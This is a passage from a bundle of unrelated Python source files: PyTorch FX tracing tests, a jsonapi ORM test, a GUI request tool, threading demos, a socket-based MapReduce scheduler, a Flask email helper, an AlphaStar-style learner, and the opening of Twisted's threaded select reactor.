"layer_norm": ARG_TYPE_MISMATCH, "lp_pool1d": ARG_TYPE_MISMATCH, "pairwise_distance": ARG_TYPE_MISMATCH, "affine_grid": CONTROL_FLOW, "alpha_dropout": CONTROL_FLOW, "batch_norm": CONTROL_FLOW, "binary_cross_entropy": CONTROL_FLOW, "binary_cross_entropy_with_logits": CONTROL_FLOW, "celu": CONTROL_FLOW, "cosine_embedding_loss": CONTROL_FLOW, "cross_entropy": CONTROL_FLOW, "ctc_loss": CONTROL_FLOW, "dropout": CONTROL_FLOW, "dropout2d": CONTROL_FLOW, "dropout3d": CONTROL_FLOW, "elu": CONTROL_FLOW, "embedding": CONTROL_FLOW, "embedding_bag": CONTROL_FLOW, "feature_alpha_dropout": CONTROL_FLOW, "fold": CONTROL_FLOW, "gaussian_nll_loss": CONTROL_FLOW, "glu": CONTROL_FLOW, "grid_sample": CONTROL_FLOW, "gumbel_softmax": CONTROL_FLOW, "hardsigmoid": CONTROL_FLOW, "hardswish": CONTROL_FLOW, "hardtanh": CONTROL_FLOW, "hinge_embedding_loss": CONTROL_FLOW, "huber_loss": CONTROL_FLOW, "interpolate": CONTROL_FLOW, "kl_div": CONTROL_FLOW, "l1_loss": CONTROL_FLOW, "leaky_relu": CONTROL_FLOW, "local_response_norm": CONTROL_FLOW, "margin_ranking_loss": CONTROL_FLOW, "max_pool1d_with_indices": CONTROL_FLOW, "max_pool2d_with_indices": CONTROL_FLOW, "max_pool3d_with_indices": CONTROL_FLOW, "mse_loss": CONTROL_FLOW, "multi_head_attention_forward": CONTROL_FLOW, "multi_margin_loss": CONTROL_FLOW, "multilabel_margin_loss": CONTROL_FLOW, "multilabel_soft_margin_loss": CONTROL_FLOW, "nll_loss": CONTROL_FLOW, "poisson_nll_loss": CONTROL_FLOW, "relu": CONTROL_FLOW, "relu6": CONTROL_FLOW, "rrelu": CONTROL_FLOW, "selu": CONTROL_FLOW, "silu": CONTROL_FLOW, "mish": CONTROL_FLOW, "smooth_l1_loss": CONTROL_FLOW, "soft_margin_loss": CONTROL_FLOW, "threshold": CONTROL_FLOW, "triplet_margin_loss": CONTROL_FLOW, "triplet_margin_with_distance_loss": CONTROL_FLOW, "unfold": CONTROL_FLOW, "upsample": CONTROL_FLOW, "upsample_bilinear": INTERPOLATE_ARGS_CONFLICT, "upsample_nearest": INTERPOLATE_ARGS_CONFLICT, "normalize" : MUTABLE, } # List of nn.functionals with Tensor inputs but not with type annotation FUNCTIONALS_WITHOUT_ANNOTATION = ( "adaptive_max_pool1d", "adaptive_max_pool2d", "adaptive_max_pool3d", "fractional_max_pool2d", "fractional_max_pool3d", "max_pool1d", "max_pool2d", "max_pool3d", "gaussian_nll_loss", "upsample", "upsample_bilinear", "upsample_nearest", ) # Inconsistent behavior between Python 3.8 and other Python versions: # - Python 3.8+: Re-raise internal exception like `PROXY_ITERATED` # - Other Python: Raise `argument of type 'Proxy' is not iterable` due to the same # internal exception above # Use the following map to override the expected exception for Python 3.8 UNTRACEABLE_FUNCTIONALS_PY38 = { "adaptive_max_pool1d": PROXY_ITERATED, "adaptive_max_pool2d": PROXY_ITERATED, "adaptive_max_pool3d": PROXY_ITERATED, "fractional_max_pool2d": PROXY_ITERATED, "fractional_max_pool3d": PROXY_ITERATED, "max_pool1d": PROXY_ITERATED, "max_pool2d": PROXY_ITERATED, "max_pool3d": PROXY_ITERATED, "group_norm": LEN_ERROR } @classmethod def _get_functional(cls): functional_list = [] for f in dir(torch.nn.functional): if not f.islower(): continue # Ignore internal functions if f.startswith('_'): continue # Ignore supporting functions if f in cls.IGNORE_FUNCS: continue fn = getattr(torch.nn.functional, f) # Ignore non-callable object like modules if not isinstance(fn, Callable): continue if f not in cls.FUNCTIONALS_WITHOUT_ANNOTATION: try: sig = inspect.signature(fn) has_tensor_arg = False for arg, param in sig.parameters.items(): if isinstance(param.annotation, type) and issubclass(param.annotation, torch.Tensor): has_tensor_arg = True if not has_tensor_arg: continue # No signature or Object is not supported except ValueError: pass functional_list.append((f, fn)) return functional_list @classmethod def generate_test_func(cls, func_name, fn): def functional_test(self): if func_name in self.UNTRACEABLE_FUNCTIONALS_PY38 and \ sys.version_info >= (3, 8) and sys.version_info < (3, 10): exc, err = self.UNTRACEABLE_FUNCTIONALS_PY38[func_name] with self.assertRaisesRegex(exc, err): symbolic_trace(fn) elif func_name in self.UNTRACEABLE_FUNCTIONALS: exc, err = self.UNTRACEABLE_FUNCTIONALS[func_name] with self.assertRaisesRegex(exc, err): symbolic_trace(fn) else: symbolic_trace(fn) return functional_test @classmethod def generate_tests(cls): functional_list = cls._get_functional() for func_name, fn in functional_list: test_name = "test_nn_functional_" + func_name functional_test = cls.generate_test_func(func_name, fn) setattr(cls, test_name, functional_test) @classmethod def setUpClass(cls): def no(*args, **kwargs): return False for name in cls.TO_PATCH.keys(): cls.TO_PATCH[name] = getattr(torch.nn.functional, name) setattr(torch.nn.functional, name, no) @classmethod def tearDownClass(cls): for name in cls.TO_PATCH.keys(): setattr(torch.nn.functional, name, cls.TO_PATCH[name]) TestFunctionalTracing.generate_tests() instantiate_device_type_tests(TestOperatorSignatures, globals()) @skipIfNoTorchVision class TestVisionTracing(JitTestCase): def setUp(self): # Checking for mutable operations whil tracing is feature flagged # Enable it in testing but not by default self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations torch.fx.proxy.TracerBase.check_mutable_operations = True def tearDown(self): torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated") INCONSISTENT_TYPE = ( RuntimeError, r"Return value was annotated as having type __torch__.torchvision.models[.\w]+ but is actually of type Tensor" ) UNTRACEABLE_MODELS = { "fasterrcnn_resnet50_fpn": PROXY_ITERATED, "fasterrcnn_mobilenet_v3_large_320_fpn": PROXY_ITERATED, "fasterrcnn_mobilenet_v3_large_fpn": PROXY_ITERATED, "maskrcnn_resnet50_fpn": PROXY_ITERATED, "keypointrcnn_resnet50_fpn": PROXY_ITERATED, "retinanet_resnet50_fpn": PROXY_ITERATED, } UNSCRIPTABLE_MODELS = { "googlenet": INCONSISTENT_TYPE, "inception_v3": INCONSISTENT_TYPE, } output_transform = { "fcn_resnet50": lambda x: x["out"], "fcn_resnet101": lambda x: x["out"], "deeplabv3_resnet50": lambda x: x["out"], "deeplabv3_resnet101": lambda x: x["out"], "deeplabv3_mobilenet_v3_large": lambda x: x["out"], "lraspp_mobilenet_v3_large": lambda x: x["out"], "fasterrcnn_resnet50_fpn": lambda x: x[1], "fasterrcnn_mobilenet_v3_large_fpn": lambda x: x[1], "fasterrcnn_mobilenet_v3_large_320_fpn": lambda x: x[1], "maskrcnn_resnet50_fpn": lambda x: x[1], "keypointrcnn_resnet50_fpn": lambda x: x[1], "retinanet_resnet50_fpn": lambda x: x[1], } @classmethod def generate_test_fn(cls, name, model_fn, x, kwargs): def run_test(self): model = model_fn(**kwargs) model = model.eval() if name in self.UNTRACEABLE_MODELS: err, exc = self.UNTRACEABLE_MODELS[name] with self.assertRaisesRegex(err, exc): graph = symbolic_trace(model) else: out_transform = self.output_transform.get(name, lambda x: x) graph : torch.fx.GraphModule = symbolic_trace(model) a = out_transform(model(x)) b = out_transform(graph(x)) self.assertEqual(a, b) if name in self.UNSCRIPTABLE_MODELS: err, exc = self.UNSCRIPTABLE_MODELS[name] with self.assertRaisesRegex(err, exc): script = torch.jit.script(graph) else: script = torch.jit.script(graph) c = out_transform(script(x)) self.assertEqual(a, c) return run_test @classmethod def generate_classification_tests(cls): for k, v in torchvision_models.__dict__.items(): if callable(v) and k[0].lower() == k[0] and k[0] != "_": test_name = 'test_torchvision_models_' + k x = torch.rand(1, 3, 299, 299) if k in ['inception_v3'] else torch.rand(1, 3, 224, 224) kwargs = dict(num_classes=50) model_test = cls.generate_test_fn(k, v, x, kwargs) setattr(cls, test_name, model_test) @classmethod def generate_segmentation_tests(cls): for k, v in torchvision_models.segmentation.__dict__.items(): if callable(v) and k[0].lower() == k[0] and k[0] != "_": test_name = 'test_torchvision_models_segmentation_' + k x = torch.rand(1, 3, 32, 32) kwargs = dict(num_classes=10, pretrained_backbone=False) model_test = cls.generate_test_fn(k, v, x, kwargs) setattr(cls, test_name, model_test) @classmethod def generate_detection_tests(cls): for k, v in torchvision_models.detection.__dict__.items(): if callable(v) and k[0].lower() == k[0] and k[0] != "_": test_name = 'test_torchvision_models_detection_' + k x = [torch.rand(3, 300, 300)] kwargs = dict(num_classes=10, pretrained_backbone=False) model_test = cls.generate_test_fn(k, v, x, kwargs) setattr(cls, test_name, model_test) @classmethod def generate_video_tests(cls): for k, v in torchvision_models.video.__dict__.items(): if callable(v) and k[0].lower() == k[0] and k[0] != "_": test_name = 'test_torchvision_models_video_' + k x = torch.rand(1, 3, 4, 112, 112) kwargs = dict(num_classes=50) model_test = cls.generate_test_fn(k, v, x, kwargs) setattr(cls, test_name, model_test) @classmethod def generate_tests(cls): cls.generate_classification_tests() cls.generate_detection_tests() cls.generate_segmentation_tests() cls.generate_video_tests() if HAS_TORCHVISION: TestVisionTracing.generate_tests() if __name__ == '__main__': run_tests()
test_api.py
import jsonapi_requests, logging, requests, unittest, time from jsonapi_requests.orm import OrmApi, AttributeField, RelationField, ApiModel from threading import Thread import sys sys.path.append('..') class Api(OrmApi): def disco(self, obj_name, obj_type = None, attributes = [], relations = [] ): ''' Discover API resource objects and create a class from the result If there's a "sample" object available in the api, the discovered attributes will be added to the the result class class Person(jsonapi_requests.orm.ApiModel): class Meta: type = 'person' api = api name = jsonapi_requests.orm.AttributeField('name') married_to = jsonapi_requests.orm.RelationField('married-to') ''' if obj_type == None: obj_type = obj_name # Create the Meta class meta_class = type('Meta', (object,), {'type' : obj_type, 'api' : self } ) # Connect to the resource collection endpoint = self.endpoint(obj_type) try: response = endpoint.get() except jsonapi_requests.request_factory.ApiConnectionError as exc: raise if response.data.as_data(): # Use the first item as test sample test_id = response.data.as_data()[0]['id'] endpoint = self.endpoint('{}/{}'.format(obj_type, test_id)) response = endpoint.get() data = response.data.as_data() attributes += data.get('attributes',{}).keys() relations += data.get('relationships',{}).keys() properties = { 'Meta' : meta_class } attr_properties = { attr : AttributeField(attr) for attr in attributes } properties.update(attr_properties) rel_properties = { rel : RelationField(rel) for rel in relations } properties.update(rel_properties) api_object = type(obj_name, (ApiModel,), properties) setattr(self, obj_name, api_object) return api_object import ctypes import threading import time # inspired by https://github.com/mosquito/crew/blob/master/crew/worker/thread.py def kill_thread( thread: threading.Thread, exception: BaseException=KeyboardInterrupt ) -> None: if not thread.isAlive(): return res = ctypes.pythonapi.PyThreadState_SetAsyncExc( ctypes.c_long(thread.ident), ctypes.py_object(exception) ) if res == 0: raise ValueError('nonexistent thread id') elif res > 1: ctypes.pythonapi.PyThreadState_SetAsyncExc(thread.ident, None) raise SystemError('PyThreadState_SetAsyncExc failed') while thread.isAlive(): time.sleep(0.01) def call_method(resource, method, data = {}): ''' ''' endpoint = resource + '/' + method try: r = requests.post(endpoint, json = data) except Exception as exc: log.error('Error while calling C&C method {} on resource {}'.format(method, endpoint)) return if not r.status_code == requests.codes.ok: log.error('Error ({}) while calling C&C method {} on resource {}'.format(r.status_code, method, resource)) return data = r.json() result = data.get('meta',{}).get('result') log.debug('C&C Result: {}'.format(result)) return result API_ROOT = 'http://0.0.0.0:5000/' def app_thread(): from examples.demo_relationship import app class Test_Api(unittest.TestCase): @classmethod def setUpClass(cls): cls.app_thread = Thread(target=app_thread) cls.app_thread.start() time.sleep(2) cls.api = Api.config({ 'API_ROOT': API_ROOT, 'AUTH': ('basic_auth_login', 'basic_auth_password'), 'VALIDATE_SSL': False, 'TIMEOUT': 1, }) cls.api.disco('User', 'Users') cls.api.disco('Book', 'Books') @classmethod def tearDownClass(cls): time.sleep(1) kill_thread(cls.app_thread) time.sleep(1) def test_0_create_user(self): user = self.api.User() user.name = 'TEST_NAME' user.save() self.assertEqual(type(user.id), str) for user in self.api.User.get_list(): print(user.id , user.name) user.delete() def test_1_add_book(self): user = self.api.User() user.save() book = self.api.Book() book.name = 'BOOK_TEST_NAME' book.save() user.books.append(book) user.save() print('Book:', user.books[0].id) book.delete() user.delete() log = logging.getLogger()
main.py
import os import sys from . import __version__ from .root import ( root, config, change_siz, tails, ) from .menu import bind_menu from .tab import ( nb, nb_names, bind_frame, delete_curr_tab, cancel_delete, create_new_reqtab, create_new_rsptab, create_helper, change_tab_name, send_request, save_config, switch_response_log, create_test_code, create_scrapy_code, get_html_pure_text, get_xpath_elements, get_auto_xpath, get_auto_json, choice_auto_json, execute_code, execute_scrapy_code, create_js_parse, create_selenium_parse, create_temp_idle, create_cmd_idle, create_encoder, create_test_code_urllib, pyset_pypi_gui, ) from .combinekey import ( bind_ctl_key, bind_alt_key, ) # 这里的框架就是目前需要设计处理的图形内容 from .frame import ( helper_window, request_window, ) # === 初始化 === settings = config['set'] if not settings: create_helper() else: for key,setting in settings.items(): if setting.get('type') == 'request': tab_id = bind_frame(request_window(setting),key) if key == config['focus']: nb.select(tab_id) # 保持最后执行成功时的 tab 焦点 # === 创建/删除/帮助 === # 绑定右键菜单 bind_menu(create_new_reqtab, '创建请求标签 [Ctrl+q]') bind_menu(delete_curr_tab, '删除当前标签 [Ctrl+w]') bind_menu(change_tab_name, '改当前标签名 [Ctrl+e]') bind_menu(save_config, '保存配置快照 [Ctrl+s]') bind_menu(create_js_parse, '创建 js解析页 [Ctrl+j]') bind_menu(create_helper, '帮助文档标签 [Ctrl+h]') bind_menu(create_selenium_parse, '浏览器执行窗 [Alt+w]*') bind_menu(create_encoder, '创建便捷加密编码窗口') bind_menu(pyset_pypi_gui, '设置全局 pypi 下载源') # 绑定 Ctrl + key 的组合键 bind_ctl_key(create_new_reqtab, 'q') bind_ctl_key(delete_curr_tab, 'w') # 撤销 ctrl + shift + w (必须是保存过的配置,并且撤销队列在程序关闭后就清空) bind_ctl_key(cancel_delete, 'w',shift=True) bind_ctl_key(change_tab_name, 'e') bind_ctl_key(save_config, 's') bind_ctl_key(send_request, 'r') bind_ctl_key(create_helper, 'h') bind_ctl_key(create_js_parse, 'j') bind_ctl_key(create_cmd_idle, '`') def _scrapy_or_selenium(): _select = nb.select() cname = nb_names.get(_select)['name'] ctype = (nb_names.get(_select).get('setting') or {}).get('type') # 如果当前窗口是 scrapy 代码窗口则代表直接项目执行 scrapy 代码,否则创建 selenium 窗口。 create_selenium_parse() if ctype != 'scrapy' else execute_scrapy_code() # 绑定 response 事件 bind_alt_key(create_new_rsptab, 'r') bind_alt_key(create_test_code, 'c') # 生成代码 bind_alt_key(get_html_pure_text, 'd') # 获取文本 bind_alt_key(get_xpath_elements, 'x') # 获取xpath bind_alt_key(get_auto_xpath, 'f') # 解析路径xpath bind_alt_key(get_auto_json, 'z') # 分析json列表 bind_alt_key(choice_auto_json, 'q') # 选则json列表 bind_alt_key(execute_code, 'v') # 代码执行 bind_alt_key(create_scrapy_code, 's') # 生成scrapy代码 bind_alt_key(_scrapy_or_selenium, 'w') # 用自动生成的环境执行scrapy代码 bind_alt_key(create_temp_idle, '`') # 使用临时的idle文本 bind_alt_key(create_test_code_urllib, 'u') # 生成 urllib(py3) 请求的代碼 def algo(): from .frame import encode_window fr = encode_window() ico = os.path.join(os.path.split(__file__)[0],'ico.ico') fr.iconbitmap(ico) fr.title('命令行输入 ee 则可快速打开便捷加密窗口(为防冲突,输入vv e也可以打开), 组合快捷键 Alt+` 快速打开IDLE') fr.bind('<Escape>',lambda *a:fr.master.quit()) fr.bind('<Alt-`>',lambda *a:create_temp_idle()) fr.bind('<Control-`>',lambda *a:create_cmd_idle()) fr.protocol("WM_DELETE_WINDOW",lambda *a:fr.master.quit()) fr.master.withdraw() fr.mainloop() escodegen = None def execute(): argv = sys.argv if 'e' in argv: algo() return def preimport(): global escodegen import time time.sleep(.5) # 需要花点时间导包的部分,用别的线程进行预加载,增加工具顺滑度 try: import js2py except: pass try: import execjs except: pass try: import js2py.py_node_modules.escodegen as escodegen except: pass import threading threading.Thread(target=preimport).start() root.title('vrequest [{}]'.format(__version__)) ico = os.path.join(os.path.split(__file__)[0],'ico.ico') root.iconbitmap(ico) root.geometry(config.get('siz') or '600x725+100+100') root.bind('<Configure>',lambda e:change_siz()) root.bind('<Escape>',lambda e:switch_response_log()) def quit_(): try: for tail in tails: try: tail() except: import traceback print(traceback.format_exc()) finally: root.destroy() root.protocol("WM_DELETE_WINDOW",lambda *a: quit_()) root.mainloop() if __name__ == '__main__': execute()
demon1.py
import threading import time def run(): time.sleep(2) print('当前线程的名字是: ', threading.current_thread().name) time.sleep(2) if __name__ == '__main__': start_time = time.time() print('这是主线程:', threading.current_thread().name) thread_list = [] for i in range(5): t = threading.Thread(target=run) thread_list.append(t) for t in thread_list: t.setDaemon(True) t.start() print('主线程结束了!' , threading.current_thread().name) print('一共用时:', time.time()-start_time)
thread_local.py
""" thread local demo """ import threading import time my_data = threading.local() def do_it2() -> None: """ do it 2 """ print("doIt2: thread id: " + str(threading.get_ident()) + ", my data: " + my_data.x) def do_it() -> None: """ do it """ time.sleep(1) my_data.x = "x: " + threading.current_thread().name print("".join([ "thread id: ", str(threading.get_ident()), ", thread name: ", threading.current_thread().name ])) do_it2() thread1 = threading.Thread(target=do_it, name="thread1") thread1.start() thread2 = threading.Thread(target=do_it, name="thread2") thread2.start()
master.py
import sys import json import socket import time import random import numpy as np import requests import threading import copy def initConfig(): with open(sys.argv[1]) as f: conf = json.load(f) # structure: [ [id, slot, port], [id, slot, port],... ] config = [] for k, v in conf.items(): for worker in v: l = [] l += worker.values() config += [l] return config def launchTask(w_id, job_id, job_type, task): config_lock.acquire() config[w_id][1]-=1 # Decrement the number of free slots config_lock.release() if(w_id == 0): # Choose socket/port based on Worker conn, addr = taskLaunchSocket1.accept() if(w_id == 1): conn, addr = taskLaunchSocket2.accept() if(w_id == 2): conn, addr = taskLaunchSocket3.accept() task['job_id'] = job_id # Add job_id and job_type (M or R) to message to be sent task['job_type'] = job_type task_logs[task['task_id']] = [time.time(), w_id+1] # Add task start time to log message = json.dumps(task) # Send task to Worker conn.send(message.encode()) conn.close() def random(job_id, tasks, job_type): #print("I schedule at random.\n") for task in tasks: w_id = np.random.randint(0,3) while(config[w_id][1]==0): # While randomly picked worker has no free slots w_id = np.random.randint(0,3) # Randomly pick another launchTask(w_id, job_id, job_type, task) # Initiate send task to Worker def roundRobin(job_id, tasks, job_type): #print("I like Round Robin.\n") for task in tasks: w_id = 0 while(config[w_id][1]==0): # While current worker has no free slots w_id = (w_id+1)%3 # pick the next launchTask(w_id, job_id, job_type, task) def leastLoaded(job_id, tasks, job_type): #print("I prefer my loads light.\n") for task in tasks: config2 = copy.copy(config) config2.sort(key=lambda x: x[1], reverse=True) # Sort a copy of config based on free slots > desc while(config2[1]==0): # If no worker has a free slot, wait 1s and try again time.sleep(1) # If no slots are free, wait for 1s config2 = copy.copy(config) config2.sort(key=lambda x: x[1], reverse=True) w_id = config2[0][0] - 1 # w_id = machine with most free slots launchTask(w_id, job_id, job_type, task) # Initiate send task to worker def pickScheduler(job_id, tasks, job_type): # Calls scheduling algo based on CL arg if(sys.argv[2] == "random"): random(job_id, tasks, job_type) elif(sys.argv[2] == "rr"): roundRobin(job_id, tasks, job_type) else: leastLoaded(job_id, tasks, job_type) def monitorReduce(): scheduled = [] # Keep track of reduce tasks that have already been schd. while(1): if(len(scheduling_pool)>0): scheduling_pool_lock.acquire() for job_id, status in scheduling_pool.items(): if(len(status[1]) == 0 and job_id not in scheduled): # If all m_tasks are complete + not already been schd. scheduled.append(job_id) # Add task to list of schd. tasks pickScheduler(job_id, status[0], 'R') # Pick scheduling algo based on CL arg scheduling_pool_lock.release() time.sleep(1) # Wait for 1s before checking again. # Thread 1 addresses Job Requests def addressRequests(): global job_count while(1): try: conn, addr = jRSocket.accept() except: break r = conn.recv(1024) # Read job request req = "" while r: # If len(req) > 1024b req += r.decode() r = conn.recv(1024) request = json.loads(req) conn.close() job_count_lock.acquire() job_count += 1 job_count_lock.release() job_logs[request['job_id']] = time.time() # Record job start time scheduling_pool_lock.acquire() # Add job to scheduling_pool scheduling_pool[request['job_id']] = [request['reduce_tasks'], [i['task_id'] for i in request['map_tasks']]] scheduling_pool_lock.release() pickScheduler(request['job_id'], request['map_tasks'], 'M') # Schedule m_tasks based on algo def updateSlots(): global job_count while(1): try: conn,addr = jUSocket.accept() except: break u = conn.recv(1024).decode() # Read task completion info update = "" while(len(u)!=0): update += u u = conn.recv(1024).decode() update = json.loads(update) end_time = time.time() # Record end time and add to task log task_logs[update['task_id']][0] = end_time - task_logs[update['task_id']][0] config_lock.acquire() config[update['w_id']-1][1]+=1 # Increment free slots on resp. worker config_lock.release() if(update['job_type'] == 'M'): # If it was a map task scheduling_pool_lock.acquire() scheduling_pool[update['job_id']][1].remove(update['task_id']) # Remove from resp job's m_task list scheduling_pool_lock.release() ''' if(len(scheduling_pool[update['job_id']][1]) == 0): random(update['job_id'], scheduling_pool[update['job_id']][0], 'R') ''' else: # If it was a reduce task for task in scheduling_pool[update['job_id']][0]: if task['task_id'] == update['task_id']: scheduling_pool_lock.acquire() scheduling_pool[update['job_id']][0].remove(task) # Remove from resp job's r_task list scheduling_pool_lock.release() break if(len(scheduling_pool[update['job_id']][0]) == 0): # If no more r_tasks in resp job # Job completed print("\n===========================================================================\n") print("\t\t\t ******** COMPLETED JOB ", update['job_id'], "*********") print("\n===========================================================================\n") job_logs[update['job_id']] = end_time - job_logs[update['job_id']] # Update duration of job scheduling_pool_lock.acquire() scheduling_pool.pop(update['job_id']) # Remove job from scheduling_pool scheduling_pool_lock.release() job_count_lock.acquire() job_count -= 1 job_count_lock.release() if(len(scheduling_pool)==0): #if(job_count == 0): # Can use any If print("\n===========================================================================\n") print("\nTASK LOGS:\n", task_logs) print("\nJOB LOGS:\n", job_logs) print("\n===========================================================================\n") print("\n\n############################################################################") print("<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< EXIT >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>") print("############################################################################\n") conn.close() # Initialize Configuration. config = initConfig() config_lock = threading.Lock() print(config) # Initialize Sockets # 5000 - Listen to Job requests # 5001 - Listen to Job updates # config[i][2] - Launch Tasks on Worker i jRSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) jRSocket.bind(("localhost", 5000)) jRSocket.listen(1) jUSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) jUSocket.bind(("localhost", 5001)) jUSocket.listen(3) taskLaunchSocket1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) taskLaunchSocket1.bind(("localhost", config[0][2])) taskLaunchSocket1.listen(1) taskLaunchSocket2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) taskLaunchSocket2.bind(("localhost", config[1][2])) taskLaunchSocket2.listen(1) taskLaunchSocket3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) taskLaunchSocket3.bind(("localhost", config[2][2])) taskLaunchSocket3.listen(1) # Initialize time logs job_logs = {} # <job_id> : time task_logs = {} # <task_id> : [time, worker] job_count = 0 job_count_lock = threading.Lock() # Initialize shared data structure. # Keeps record of job requests yet to complete exec # Used to track map task completion. # Removes task from task list on completion. # If len(map_tasks) == 0, launch reduce tasks. scheduling_pool = {} # {job_id : [ [r_tasks {dict of id and dur}],[m_tasks {list of task ids] ],...} scheduling_pool_lock = threading.Lock() t1 = threading.Thread(target = addressRequests, name = "Thread1") # Listens to Job Requests and schedules t2 = threading.Thread(target = updateSlots, name = "Thread2") # Listens to updates on Task Completion t3 = threading.Thread(target = monitorReduce, name = "Thread3") # Checks for completion m_tasks to launch r_tasks t1.start() t2.start() t3.start() t1.join() t2.join() t3.join() print(config) jRSocket.close() jUSocket.close() taskLaunchSocket.close()
email.py
# -*- coding:utf-8 -*- from threading import Thread from flask import current_app, render_template from flask_mail import Message from . import mail def send_async_email(app, msg): with app.app_context(): mail.send(msg) def send_email(to, subject, template, **kwargs): app = current_app._get_current_object() msg = Message(app.config['CASEMGR_MAIL_SUBJECT_PREFIX'] + ' ' + subject, sender=app.config['CASEMGR_MAIL_SENDER'], recipients=[to]) msg.body = render_template(template + '.txt', **kwargs) msg.html = render_template(template + '.html', **kwargs) thr = Thread(target=send_async_email, args=[app, msg]) thr.start() return thr
learner.py
#!/usr/bin/env python # -*- coding: utf-8 -*- " The code for the learner in the actor-learner mode in the IMPALA architecture" # modified from AlphaStar pseudo-code import os import traceback from time import time, sleep, strftime, localtime import threading import itertools import torch from torch.optim import Adam, RMSprop from alphastarmini.core.rl.rl_loss import loss_function from alphastarmini.lib.hyper_parameters import Arch_Hyper_Parameters as AHP from alphastarmini.lib.hyper_parameters import RL_Training_Hyper_Parameters as THP __author__ = "Ruo-Ze Liu" debug = False # model path MODEL = "rl" MODEL_PATH = "./model/" if not os.path.exists(MODEL_PATH): os.mkdir(MODEL_PATH) SAVE_PATH = os.path.join(MODEL_PATH, MODEL + "_" + strftime("%y-%m-%d_%H-%M-%S", localtime())) class Learner: """Learner worker that updates agent parameters based on trajectories.""" def __init__(self, player, max_time_for_training=60 * 3): self.player = player self.player.set_learner(self) self.trajectories = [] # AlphaStar code #self.optimizer = AdamOptimizer(learning_rate=3e-5, beta1=0, beta2=0.99, epsilon=1e-5) # PyTorch code self.optimizer = Adam(self.get_parameters(), lr=THP.learning_rate, betas=(THP.beta1, THP.beta2), eps=THP.epsilon, weight_decay=THP.weight_decay) self.thread = threading.Thread(target=self.run, args=()) self.thread.daemon = True # Daemonize thread self.max_time_for_training = max_time_for_training self.is_running = False self.is_rl_training = True def get_parameters(self): return self.player.agent.get_parameters() def send_trajectory(self, trajectory): self.trajectories.append(trajectory) def update_parameters(self): trajectories = self.trajectories[:AHP.batch_size] self.trajectories = self.trajectories[AHP.batch_size:] if 0 and self.is_rl_training: agent = self.player.agent print("begin backward") if debug else None # a error: cudnn RNN backward can only be called in training mode agent.agent_nn.model.train() #torch.backends.cudnn.enabled = False self.optimizer.zero_grad() with torch.autograd.set_detect_anomaly(True): loss = loss_function(agent, trajectories) print("loss:", loss) if debug else None loss.backward() self.optimizer.step() print("end backward") if debug else None # we use new ways to save # torch.save(agent.agent_nn.model, SAVE_PATH + "" + ".pkl") torch.save(agent.agent_nn.model.state_dict(), SAVE_PATH + "" + ".pth") agent.steps += AHP.batch_size * AHP.sequence_length # num_steps(trajectories) # self.player.agent.set_weights(self.optimizer.minimize(loss)) def start(self): self.thread.start() # background def run(self): try: start_time = time() self.is_running = True while time() - start_time < self.max_time_for_training: try: # if at least one actor is running, the learner would not stop actor_is_running = False if len(self.player.actors) == 0: actor_is_running = True for actor in self.player.actors: if actor.is_start: actor_is_running = actor_is_running | actor.is_running else: actor_is_running = actor_is_running | 1 if actor_is_running: print('learner trajectories size:', len(self.trajectories)) if len(self.trajectories) >= AHP.batch_size: print("learner begin to update parameters") self.update_parameters() sleep(1) else: print("Actor stops!") print("Learner also stops!") return except Exception as e: print("Learner.run() Exception cause break, Detials of the Exception:", e) print(traceback.format_exc()) break except Exception as e: print("Learner.run() Exception cause return, Detials of the Exception:", e) finally: self.is_running = False def test(on_server): pass
_threadedselect.py
# -*- test-case-name: twisted.test.test_internet -*- # Copyright (c) Twisted Matrix Laboratories. # See LICENSE for details. """ Threaded select reactor The threadedselectreactor is a specialized reactor for integrating with arbitrary foreign event loop, such as those you find in GUI toolkits. There are three things you'll need to do to use this reactor. Install the reactor at the beginning of your program, before importing the rest of Twisted:: | from twisted.internet import _threadedselect | _threadedselect.install() Interleave this reactor with your foreign event loop, at some point after your event loop is initialized:: | from twisted.internet import reactor | reactor.interleave(foreignEventLoopWakerFunction) | self.addSystemEventTrigger('after', 'shutdown', foreignEventLoopStop) Instead of shutting down the foreign event loop directly, shut down the reactor:: | from twisted.internet import reactor | reactor.stop() In order for Twisted to do its work in the main thread (the thread that interleave is called from), a waker function is necessary. The waker function will be called from a "background" thread with one argument: func. The waker function's purpose is to call func() from the main thread. Many GUI toolkits ship with appropriate waker functions. Some examples of this are wxPython's wx.callAfter (may be wxCallAfter in older versions of wxPython) or PyObjC's PyObjCTools.AppHelper.callAfter. These would be used in place of "foreignEventLoopWakerFunction" in the above example. The other integration point at which the foreign event loop and this reactor must integrate is shutdown. In order to ensure clean shutdown of Twisted, you must allow for Twisted to come to a complete stop before quitting the application. Typically, you will do this by setting up an after shutdown trigger to stop your foreign event loop, and call reactor.stop() where you would normally have initiated the shutdown procedure for the foreign event loop. Shutdown functions that could be used in place of "foreignEventloopStop" would be the ExitMainLoop method of the wxApp instance with wxPython, or the PyObjCTools.AppHelper.stopEventLoop function. """ from functools import partial from threading import Thread from queue import Queue, Empty import sys from zope.interface import implementer from twisted.internet.interfaces import IReactorFDSet from twisted.internet import posixbase from twisted.internet.posixbase import _NO_FILENO, _NO_FILEDESC from twisted.python import log, failure, threadable import select from errno import EINTR, EBADF from twisted.internet.selectreactor import _select def dictRemove(dct, value): try: del dct[value] except KeyError: pass def raiseException(e): raise e @implementer(IReactorFDSet) class ThreadedSelectReactor(posixbase.PosixReactorBase): """A threaded select() based reactor - runs on all POSIX platforms and on Win32. """ def __init__(self): threadable.init(1) self.reads = {} self.writes = {} self.toThreadQueue = Queue() self.toMainThread = Queue() self.workerThread = None self.mainWaker = None posixbase.PosixReactorBase.__init__(self) self.addSystemEventTrigger("after", "shutdown", self._mainLoopShutdown) def wakeUp(self): # we want to wake up from any thread self.waker.wakeUp() def callLater(self, *args, **kw): tple = posixbase.PosixReactorBase.callLater(self, *args, **kw) self.wakeUp() return tple def _sendToMain(self, msg, *args): self.toMainThread.put((msg, args)) if self.mainWaker is not None: self.mainWaker() def _sendToThread(self, 